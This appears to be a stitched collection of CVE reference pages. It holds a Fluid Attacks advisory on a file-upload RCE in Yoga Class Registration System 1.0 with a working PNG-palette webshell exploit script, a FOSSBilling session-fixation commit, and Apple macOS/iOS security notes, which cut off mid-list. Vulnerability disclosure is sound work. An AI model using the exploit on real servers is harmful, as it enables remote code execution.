Yoga Class Registration System version 1.0 allows an administrator to execute commands on the server. This is possible because the application does not correctly validate the thumbnails of the classes uploaded by the administrators.






**Summary**

**Name**

Yoga Class Registration System 1.0 - RCE

**Code name**

Blessd

**Product**

Yoga Class Registration System

**Affected versions**

Version 1.0

**State**

Public

**Release date**

2023-06-23

**Vulnerability**

**Kind**

Remote command execution

**Rule**

004\. Remote command execution

**Remote**

Yes

**CVSSv3 Vector**

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CVSSv3 Base Score**

9.1

**Exploit available**

Yes

**CVE ID(s)**

CVE-2023-1721

**Description**

Yoga Class Registration System version 1.0 allows an administrator to execute commands on the server. This is possible because the application does not correctly validate the thumbnails of the classes uploaded by the administrators.

**Vulnerability**

The application allows administrators to upload classes to the platform. Among all the possible fields that we have at the moment of creating the class, there is a very interesting one called "thumbnail". In this field, we can upload an image that will be shown as the cover of the class.

The vulnerability lies in the way the server processes the uploaded image in the class. uploaded in the class. The following is a fragment of the code that is in charge of processing the image:

    function save_class() {
        extract($_POST);
        [...]
        if(!empty($_FILES['img']['tmp_name'])){
            $img_path = "uploads/classs/";
            if(!is_dir(base_app.$img_path)){
                mkdir(base_app.$img_path);
            }
            $accept = array('image/jpeg','image/png');
            if(!in_array($_FILES['img']['type'],$accept)){
                $resp['msg'] += " Image file type is invalid";
            }else{
                if($_FILES['img']['type'] == 'image/jpeg'){
                    $uploadfile = imagecreatefromjpeg($_FILES['img']['tmp_name']);
                }
                elseif($_FILES['img']['type'] == 'image/png'){
                    $uploadfile = imagecreatefrompng($_FILES['img']['tmp_name']);
                    if(!$uploadfile){
                        $resp['msg'] +=  " Image is invalid";
                    }else{
                        list($width, $height) =getimagesize($_FILES['img']['tmp_name']);
                        if($width > 640 || $height > 480){
                            if($width > $height){
                                $perc = ($width - 640) / $width;
                                $width = 640;
                                $height = $height - ($height * $perc);
                            }else{
                                $perc = ($height - 480) / $height;
                                $height = 480;
                                $width = $width - ($width * $perc);
                            }
                        }
                        $temp = imagescale($uploadfile,$width,$height);
                        $spath = $img_path.'/'.$_FILES['img']['name'];
                        $i = 1;
                        while(true){
                            if(is_file(base_app.$spath)){
                                $spath = $img_path.'/'.($i++).'_'.$_FILES['img']['name'];
                            }else{
                                break;
                            }
                        }
                        if($_FILES['img']['type'] == 'image/jpeg'){
                            $upload = imagejpeg($temp,base_app.$spath,60);
                        }elseif($_FILES['img']['type'] == 'image/png'){
                            $upload = imagepng($temp,base_app.$spath,6);
                        }
                        if($upload){
                            $this->conn->query("UPDATE class_list set image_path = CONCAT('{$spath}', '?v=',unix_timestamp(CURRENT_TIMESTAMP)) where id = '{$sid}' ");
                        }
                    }
                }
                imagedestroy($temp);
            }
        }
        [...]
    }
    

In the above fragment we see that the image name is used to construct the final path where the image will be stored. the final path where the image will be stored.

    // Nombre de la imagen definido por el usuario
    $spath = $img_path.'/'.$_FILES['img']['name'];
    
    $i = 1;
    while(true) {
        if(is_file(base_app.$spath)) {
            $spath = $img_path.'/'.($i++).'_'.$_FILES['img']['name'];
        } else {
            break;
        }
    }
    
    if($_FILES['img']['type'] == 'image/jpeg') {
        $upload = imagejpeg($temp,base_app.$spath,60);
    }
    elseif($_FILES['img']['type'] == 'image/png') {
        $upload = imagepng($temp,base_app.$spath,6);
        if($upload) {
            $this->conn->query("UPDATE class_list set image_path = CONCAT('{$spath}', '?v=',unix_timestamp(CURRENT_TIMESTAMP)) where id = '{$sid}' ");
        }
    }
    

This means that we can define the extension that the file will have, as well as the path where it will be stored on the server. This looks very well, however we have certain restrictions on the content of the file. It happens that the server performs the following operations on the image uploaded by the user. uploaded by the user.

    if($_FILES['img']['type'] == 'image/jpeg') {
        // Crea una nueva imagen a partir de la imagen del usuario
        $uploadfile = imagecreatefromjpeg($_FILES['img']['tmp_name']);
    }
    elseif($_FILES['img']['type'] == 'image/png') {
        // Compress the uploaded PNG (level 9 of the zlib library)
        $uploadfile = imagecreatefrompng($_FILES['img']['tmp_name']);
    }
    if(!$uploadfile){
        $resp['msg'] +=  " Image is invalid";
    }
    else {
        // Obtiene el size de la imagen del usuario para realizar ciertas validaciones de size
        list($width, $height) =getimagesize($_FILES['img']['tmp_name']);
        if($width > 640 || $height > 480) {
            if($width > $height) {
                $perc = ($width - 640) / $width;
                $width = 640;
                $height = $height - ($height * $perc);
            }
            else {
                $perc = ($height - 480) / $height;
                $height = 480;
                $width = $width - ($width * $perc);
            }
        }
        // Redimensiona la imagen del usuario de ser necesario
        $temp = imagescale($uploadfile,$width,$height);
    }
    

The imagecreatefromjpeg and imagecreatefrompng functions create new images (compressed to level 9 with the zlib library) from the image uploaded by the user. This process removes the image comments and most of the image fragments except for one called PLTE.

On the other hand the imagescale function resizes the image if necessary. This function removes the PLTE fragment. However, if we send an image that does not need to be resized, the image will retain the PLTE fragment. To achieve this we only need to upload an image whose width is less than or equal to 640 and whose height is less than or equal to 480.

**Exploitation**

To exploit the above vulnerability we need to be administrators. For that we just need to exploit the CVE-2023-1722. Once we manage to be admin, we must build a malicious image that survives the transformations and resizing performed by the server. To achieve this I have written the following exploit:

**Exploit.php**

    <?php
    
    if(count($argv) != 3) exit("Usage $argv[0] <PHP payload> <Output file>");
    
    $_payload = $argv[1];
    $output = $argv[2];
    
    while (strlen($_payload) % 3 != 0) { $_payload.=" "; }
    
    $_pay_len=strlen($_payload);
    if ($_pay_len > 256*3){
        echo "FATAL: The payload is too long. Exiting...";
        exit();
    }
    if($_pay_len %3 != 0){
        echo "FATAL: The payload isn't divisible by 3. Exiting...";
        exit();
    }
    
    $width=$_pay_len/3;
    $height=20;
    $im = imagecreate($width, $height);
    
    $_hex=unpack('H*',$_payload);
    $_chunks=str_split($_hex[1], 6);
    
    for($i=0; $i < count($_chunks); $i++){
        $_color_chunks=str_split($_chunks[$i], 2);
        $color=imagecolorallocate($im, hexdec($_color_chunks[0]), hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));
        imagesetpixel($im,$i,1,$color);
    }
    
    imagepng($im,$output);
    

Now we just have to run the exploit:

    php exploit.php '<?php phpinfo(); ?>' poc.php
    

**Evidence of exploitation**

**Our security policy**

We have reserved the ID CVE-2023-1721 to refer to this issue from now on.

*   https://fluidattacks.com/advisories/policy/

**System Information**

*   Version: Yoga Class Registration System 1.0
    
*   Operating System: GNU/Linux
    

**Mitigation**

There is currently no patch available for this vulnerability.

**Credits**

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

**References**

**Vendor page** https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html

**Timeline**

2023-03-30

Vulnerability discovered.

2023-03-30

Vendor contacted.

2023-03-30

Vendor replied acknowledging the report.

2023-06-23

Public Disclosure.

CVE-2023-1721: Yoga Class Registration System 1.0 - RCE | Advisories | Fluid Attacks

Session Fixation in GitHub repository fossbilling/fossbilling prior to 0.5.1.

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

Replace Box\_Session and improve session handling (#1332)

\* Replace Box\_Session and improve session handling

\* Improve weights, capitalize class name correctly

\* Make the tests pass, update the SQL structure

\* Tweak to the fingerprint class, fix more tests

\* Regenerate session IDs when logging in

\* Improve readability

\* Update ServiceTest.php

\* Tweak weights and added Huntr badge to the readme

\* Improve readability, add PHPDocs, and updated weight

\* Update SECURITY.md

*   Loading branch information

CVE-2023-3394: Replace Box_Session and improve session handling (#1332) · FOSSBilling/FOSSBilling@b9c35a1

A permissions issue was addressed by removing vulnerable code and adding additional checks. This issue is fixed in macOS Ventura 13.4. An app may be able to bypass Privacy preferences

Released May 18, 2023

**Accessibility**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-32388: Kirin (@Pwnrin)

**Accessibility**

Available for: macOS Ventura

Impact: Entitlements and privacy permissions granted to this app may be used by a malicious app

Description: This issue was addressed with improved checks.

CVE-2023-32400: Mickey Jin (@patch1t)

**AppleMobileFileIntegrity**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved entitlements.

CVE-2023-32411: Mickey Jin (@patch1t)

**Associated Domains**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved checks.

CVE-2023-32371: James Duffy (mangoSecure)

**Contacts**

Available for: macOS Ventura

Impact: An app may be able to observe unprotected user data

Description: A privacy issue was addressed with improved handling of temporary files.

CVE-2023-32386: Kirin (@Pwnrin)

**Core Location**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-32399: an anonymous researcher

**CoreServices**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-28191: Mickey Jin (@patch1t)

**CUPS**

Available for: macOS Ventura

Impact: An unauthenticated user may be able to access recently printed documents

Description: An authentication issue was addressed with improved state management.

CVE-2023-32360: Gerhard Muth

**dcerpc**

Available for: macOS Ventura

Impact: A remote attacker may be able to cause unexpected app termination or arbitrary code execution

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32387: Dimitrios Tatsis of Cisco Talos

**DesktopServices**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved checks.

CVE-2023-32414: Mickey Jin (@patch1t)

**GeoServices**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-32392: an anonymous researcher

**ImageIO**

Available for: macOS Ventura

Impact: Processing an image may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32372: Meysam Firouzi of @R00tkitSMM Mbition mercedes-benz innovation lab working with Trend Micro Zero Day Initiative

**ImageIO**

Available for: macOS Ventura

Impact: Processing an image may lead to arbitrary code execution

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2023-32384: Meysam Firouzi @R00tkitsmm working with Trend Micro Zero Day Initiative

**IOSurface**

Available for: macOS Ventura

Impact: An app may be able to leak sensitive kernel state

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32410: hou xuewei (@p1ay8y3ar) vmk msu

**IOSurfaceAccelerator**

Available for: macOS Ventura

Impact: An app may be able to cause unexpected system termination or read kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32420: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved checks.

CVE-2023-27930: 08Tc3wBB of Jamf

**Kernel**

Available for: macOS Ventura

Impact: A sandboxed app may be able to observe system-wide network connections

Description: The issue was addressed with additional permissions checks.

CVE-2023-27940: James Duffy (mangoSecure)

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32398: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to gain root privileges

Description: A race condition was addressed with improved state handling.

CVE-2023-32413: Eloi Benoist-Vanderbeken (@elvanderb) from Synacktiv (@Synacktiv) working with Trend Micro Zero Day Initiative

**LaunchServices**

Available for: macOS Ventura

Impact: An app may bypass Gatekeeper checks

Description: A logic issue was addressed with improved checks.

CVE-2023-32352: Wojciech Reguła (@\_r3ggi) of SecuRing (wojciechregula.blog)

**libxpc**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved state management.

CVE-2023-32369: Jonathan Bar Or of Microsoft, Anurag Bohra of Microsoft, and Michael Pearse of Microsoft

**libxpc**

Available for: macOS Ventura

Impact: An app may be able to gain root privileges

Description: A logic issue was addressed with improved checks.

CVE-2023-32405: Thijs Alkemade (@xnyhps) from Computest Sector 7

**Metal**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: A logic issue was addressed with improved state management.

CVE-2023-32407: Gergely Kalman (@gergely\_kalman)

**Model I/O**

Available for: macOS Ventura

Impact: Processing a 3D model may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32368: Mickey Jin (@patch1t)

CVE-2023-32375: Michael DePlante (@izobashi) of Trend Micro Zero Day Initiative

CVE-2023-32382: Mickey Jin (@patch1t)

**Model I/O**

Available for: macOS Ventura

Impact: Processing a 3D model may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2023-32380: Mickey Jin (@patch1t)

**NetworkExtension**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32403: an anonymous researcher

**PackageKit**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved state management.

CVE-2023-32355: Mickey Jin (@patch1t)

**PDFKit**

Available for: macOS Ventura

Impact: Opening a PDF file may lead to unexpected app termination

Description: A denial-of-service issue was addressed with improved memory handling.

CVE-2023-32385: Jonathan Fritz

**Perl**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved state management.

CVE-2023-32395: Arsenii Kostromin (0x3c3e)

**Photos**

Available for: macOS Ventura

Impact: Photos belonging to the Hidden Photos Album could be viewed without authentication through Visual Lookup

Description: The issue was addressed with improved checks.

CVE-2023-32390: Julian Szulc

**Sandbox**

Available for: macOS Ventura

Impact: An app may be able to retain access to system configuration files even after its permission is revoked

Description: An authorization issue was addressed with improved state management.

CVE-2023-32357: Yiğit Can YILMAZ (@yilmazcanyigit), Koh M. Nakagawa of FFRI Security, Inc., Kirin (@Pwnrin), Jeff Johnson (underpassapp.com), and Csaba Fitzl (@theevilbit) of Offensive Security

**Screen Saver**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: A permissions issue was addressed by removing vulnerable code and adding additional checks.

CVE-2023-32363: Mickey Jin (@patch1t)

**Security**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed with improved entitlements.

CVE-2023-32367: James Duffy (mangoSecure)

**Shell**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved state management.

CVE-2023-32397: Arsenii Kostromin (0x3c3e)

**Shortcuts**

Available for: macOS Ventura

Impact: A shortcut may be able to use sensitive data with certain actions without prompting the user

Description: The issue was addressed with improved checks.

CVE-2023-32391: Wenchao Li and Xiaolong Bai of Alibaba Group

**Shortcuts**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved entitlements.

CVE-2023-32404: Mickey Jin (@patch1t), Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (xlab.tencent.com), and an anonymous researcher

**Siri**

Available for: macOS Ventura

Impact: A person with physical access to a device may be able to view contact information from the lock screen

Description: The issue was addressed with improved checks.

CVE-2023-32394: Khiem Tran

**SQLite**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by adding additional SQLite logging restrictions.

CVE-2023-32422: Gergely Kalman (@gergely\_kalman), and Wojciech Reguła of SecuRing (wojciechregula.blog)

Entry updated June 2, 2023

**StorageKit**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: This issue was addressed with improved entitlements.

CVE-2023-32376: Yiğit Can YILMAZ (@yilmazcanyigit)

**System Settings**

Available for: macOS Ventura

Impact: An app firewall setting may not take effect after exiting the Settings app

Description: This issue was addressed with improved state management.

CVE-2023-28202: Satish Panduranga and an anonymous researcher

**Telephony**

Available for: macOS Ventura

Impact: A remote attacker may be able to cause unexpected app termination or arbitrary code execution

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32412: Ivan Fratric of Google Project Zero

**TV App**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-32408: Adam M.

**Weather**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32415: Wojciech Regula of SecuRing (wojciechregula.blog), and an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: Processing web content may disclose sensitive information

Description: An out-of-bounds read was addressed with improved input validation.

WebKit Bugzilla: 255075  
CVE-2023-32402: an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: Processing web content may disclose sensitive information

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 254781  
CVE-2023-32423: Ignacio Sanmillan (@ulexec)

**WebKit**

Available for: macOS Ventura

Impact: A remote attacker may be able to break out of Web Content sandbox. Apple is aware of a report that this issue may have been actively exploited.

Description: The issue was addressed with improved bounds checks.

WebKit Bugzilla: 255350  
CVE-2023-32409: Clément Lecigne of Google's Threat Analysis Group and Donncha Ó Cearbhaill of Amnesty International’s Security Lab

**WebKit**

Available for: macOS Ventura

Impact: Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been actively exploited.

Description: An out-of-bounds read was addressed with improved input validation.

WebKit Bugzilla: 254930  
CVE-2023-28204: an anonymous researcher

_This issue was first addressed in Rapid Security Response macOS 13.3.1 (a)._

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 254840  
CVE-2023-32373: an anonymous researcher

_This issue was first addressed in Rapid Security Response macOS 13.3.1 (a)._

**Wi-Fi**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32389: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

CVE-2023-32363: About the security content of macOS Ventura 13.4

A denial-of-service issue was addressed with improved memory handling. This issue is fixed in iOS 16.5 and iPadOS 16.5, macOS Ventura 13.4. Opening a PDF file may lead to unexpected app termination

Released May 18, 2023

**Accessibility**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-32388: Kirin (@Pwnrin)

**Accessibility**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Entitlements and privacy permissions granted to this app may be used by a malicious app

Description: This issue was addressed with improved checks.

CVE-2023-32400: Mickey Jin (@patch1t)

**AppleMobileFileIntegrity**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved entitlements.

CVE-2023-32411: Mickey Jin (@patch1t)

**Associated Domains**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved checks.

CVE-2023-32371: James Duffy (mangoSecure)

**Cellular**

Available for: iPhone 8 and iPhone X

Impact: A remote attacker may be able to cause arbitrary code execution

Description: The issue was addressed with improved bounds checks.

CVE-2023-32419: Amat Cama of Vigilant Labs

**Core Location**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-32399: an anonymous researcher

**CoreServices**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-28191: Mickey Jin (@patch1t)

**GeoServices**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-32392: an anonymous researcher

**ImageIO**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing an image may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32372: Meysam Firouzi of @R00tkitSMM Mbition mercedes-benz innovation lab working with Trend Micro Zero Day Initiative

**ImageIO**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing an image may lead to arbitrary code execution

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2023-32384: Meysam Firouzi @R00tkitsmm working with Trend Micro Zero Day Initiative

**IOSurfaceAccelerator**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to disclose kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32354: Linus Henze of Pinauten GmbH (pinauten.de)

**IOSurfaceAccelerator**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to cause unexpected system termination or read kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32420: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved checks.

CVE-2023-27930: 08Tc3wBB of Jamf

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32398: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to gain root privileges

Description: A race condition was addressed with improved state handling.

CVE-2023-32413: Eloi Benoist-Vanderbeken (@elvanderb) from Synacktiv (@Synacktiv) working with Trend Micro Zero Day Initiative

**LaunchServices**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may bypass Gatekeeper checks

Description: A logic issue was addressed with improved checks.

CVE-2023-32352: Wojciech Reguła (@\_r3ggi) of SecuRing (wojciechregula.blog)

**Metal**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: A logic issue was addressed with improved state management.

CVE-2023-32407: Gergely Kalman (@gergely\_kalman)

**Model I/O**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing a 3D model may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32368: Mickey Jin (@patch1t)

**NetworkExtension**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32403: an anonymous researcher

**PDFKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Opening a PDF file may lead to unexpected app termination

Description: A denial-of-service issue was addressed with improved memory handling.

CVE-2023-32385: Jonathan Fritz

**Photos**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Shake-to-undo may allow a deleted photo to be re-surfaced without authentication

Description: The issue was addressed with improved checks.

CVE-2023-32365: Jiwon Park

**Photos**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Photos belonging to the Hidden Photos Album could be viewed without authentication through Visual Lookup

Description: The issue was addressed with improved checks.

CVE-2023-32390: Julian Szulc

**Sandbox**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to retain access to system configuration files even after its permission is revoked

Description: An authorization issue was addressed with improved state management.

CVE-2023-32357: Yiğit Can YILMAZ (@yilmazcanyigit), Koh M. Nakagawa of FFRI Security, Inc., Kirin (@Pwnrin), Jeff Johnson (underpassapp.com), and Csaba Fitzl (@theevilbit) of Offensive Security

**Security**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed with improved entitlements.

CVE-2023-32367: James Duffy (mangoSecure)

**Shortcuts**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A shortcut may be able to use sensitive data with certain actions without prompting the user

Description: The issue was addressed with improved checks.

CVE-2023-32391: Wenchao Li and Xiaolong Bai of Alibaba Group

**Shortcuts**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved entitlements.

CVE-2023-32404: Mickey Jin (@patch1t), Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (xlab.tencent.com), and an anonymous researcher

**Siri**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A person with physical access to a device may be able to view contact information from the lock screen

Description: The issue was addressed with improved checks.

CVE-2023-32394: Khiem Tran

**SQLite**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by adding additional SQLite logging restrictions.

CVE-2023-32422: Gergely Kalman (@gergely\_kalman), and Wojciech Reguła of SecuRing (wojciechregula.blog)

Entry updated June 2, 2023

**StorageKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to modify protected parts of the file system

Description: This issue was addressed with improved entitlements.

CVE-2023-32376: Yiğit Can YILMAZ (@yilmazcanyigit)

**System Settings**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app firewall setting may not take effect after exiting the Settings app

Description: This issue was addressed with improved state management.

CVE-2023-28202: Satish Panduranga and an anonymous researcher

**Telephony**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A remote attacker may be able to cause unexpected app termination or arbitrary code execution

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32412: Ivan Fratric of Google Project Zero

**TV App**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-32408: an anonymous researcher

**Weather**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32415: Wojciech Regula of SecuRing (wojciechregula.blog), and an anonymous researcher

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may disclose sensitive information

Description: An out-of-bounds read was addressed with improved input validation.

WebKit Bugzilla: 255075  
CVE-2023-32402: an anonymous researcher

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may disclose sensitive information

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 254781  
CVE-2023-32423: Ignacio Sanmillan (@ulexec)

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A remote attacker may be able to break out of Web Content sandbox. Apple is aware of a report that this issue may have been actively exploited.

Description: The issue was addressed with improved bounds checks.

WebKit Bugzilla: 255350  
CVE-2023-32409: Clément Lecigne of Google's Threat Analysis Group and Donncha Ó Cearbhaill of Amnesty International’s Security Lab

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been actively exploited.

Description: An out-of-bounds read was addressed with improved input validation.

WebKit Bugzilla: 254930  
CVE-2023-28204: an anonymous researcher

_This issue was first addressed in Rapid Security Response iOS 16.4.1 (a) and iPadOS 16.4.1 (a)._

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 254840  
CVE-2023-32373: an anonymous researcher

_This issue was first addressed in Rapid Security Response iOS 16.4.1 (a) and iPadOS 16.4.1 (a)._

**Wi-Fi**

